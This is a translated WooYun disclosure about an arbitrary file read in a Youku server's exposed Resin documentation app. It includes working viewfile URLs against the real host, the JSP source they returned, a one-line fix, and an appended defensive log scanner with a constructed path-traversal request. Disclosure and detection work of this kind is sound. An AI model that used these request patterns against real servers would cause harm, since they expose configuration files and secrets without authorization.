Vulnerability summary

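Bug ID: wooyun-2013-019360

Title: Arbitrary file read on a Youku site server

Vendor: Youku

Reporter: upload

Submitted: 2013-03-01 12:08

Fixed: 2013-04-15 12:09

Disclosed: 2013-04-15 12:09

Vulnerability type: System/service operations misconfiguration

Severity: Medium

Self-assessed Rank: 5

Status: Confirmed by vendor

Source: http://www.wooyun.org (for questions or help, contact [email protected])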


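Vulnerability details

Disclosure status:

2013-03-01: Details reported to the vendor; awaiting vendor handling
2013-03-01: Vendor confirmed; details disclosed to the vendor only
2013-03-11: Details disclosed to core white hats and experts in related fields
2013-03-21: Details disclosed to regular white hats
2013-03-31: Details disclosed to trainee white hats
2013-04-15: Details disclosed to the public

Brief description:

Misconfiguration leading to file read.

Detailed description:

Some older versions of the Resin server have a vulnerability that allows reading arbitrary files or directly listing the files in a target directory.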
urls:

http://index.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp


http://index.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml


I don't know Java well and didn't find any sensitive files, but this is still a problem.

Proof of vulnerability:

url:

http://index.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp


code:

<%@ page session="false" import="javax.management.* com.caucho.jmx.Jmx java.util.*" %>
<%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%
// stop browser from caching the page
response.setHeader("Cache-Control","no-cache,post-check=0,pre-check=0,no-store");
response.setHeader("Pragma","no-cache");
response.setHeader("Expires","Thu,01Dec199416:00:00GMT");
// refresh every 5 seconds
response.setHeader("refresh","5");
// prepare objects
ObjectName query = new ObjectName("resin:type=PeriodicTask,*");
pageContext.setAttribute("mbeans",Jmx.query(query));
%>
<html>
<head><title>mbean</title></head>
<body>
<h1>mbean</h1>
This page is automatically refreshed every 5 seconds.
<c:forEach var="mbean" items="${mbeans}">
<hr/>
<dl>
<dt>estimatedAverageTime
<dd>${mbean.estimatedAverageTime}
<dt>active
<dd>${mbean.active}
<dt>estimatedTimeRemaining
<dd>${mbean.estimatedTimeRemaining}
<dt>lastActiveTime
<dd>${mbean.lastActiveTime}
<dt>totalActiveCount
<dd>${mbean.totalActiveCount}
<dt>totalActiveTime
<dd>${mbean.totalActiveTime}
<dt>averageActiveTime
<dd>${mbean.averageActiveTime}
</dl>
</c:forEach>
<hr/>
</body>
</html>


Remediation:

Upgrade the server version or set permissions.

Copyright notice: when reposting, please credit the source upload@WooYun
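
A defender-side check for the exposure described in this report, as an added example that is not part of the original submission: it scans web access logs for requests to the `viewfile` endpoint under `/resin-doc/` and ranks those whose `file` parameter reaches into `WEB-INF`, `META-INF` or a parent directory. The log lines are constructed, and the combined log format and the helper names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format is an assumption;
# client IPs are documentation ranges). Paths follow the URLs in the report.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2013:12:00:01 +0800] "GET /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp HTTP/1.1" 200 812
192.0.2.10 - - [01/Mar/2013:12:00:05 +0800] "GET /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml HTTP/1.1" 200 1530
198.51.100.7 - - [01/Mar/2013:12:01:00 +0800] "GET /index.html HTTP/1.1" 200 5120
192.0.2.10 - - [01/Mar/2013:12:02:00 +0800] "GET /resin-doc/examples/ioc-periodictask/viewfile?file=%2e%2e%2fWEB-INF%2fweb.xml HTTP/1.1" 404 0
"""

# Hypothetical helper names below; adapt the regex to your own log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def classify(target):
    """Return None unless target is a resin-doc viewfile request, else (file, severity)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if "/resin-doc/" not in path or not path.endswith("/viewfile"):
        return None
    file_param = parse_qs(parts.query).get("file", [""])[0]  # already percent-decoded
    segments = file_param.replace("\\", "/").lower().split("/")
    sensitive = "web-inf" in segments or "meta-inf" in segments or ".." in segments
    # Any hit means the sample docs app is exposed; config-directory reads rank higher.
    return file_param, ("high" if sensitive else "review")


def scan(log_text):
    """Collect one finding per resin-doc viewfile request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        hit = classify(m.group("target")) if m else None
        if hit:
            findings.append({"ip": m.group("ip"), "file": hit[0], "severity": hit[1],
                             "served": m.group("status") == "200"})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true means the server returned the file, so the `resin-doc` sample application is still deployed and reachable on that host.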


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-03-01 12:11

Vendor reply:

Thanks

Latest status:

None yet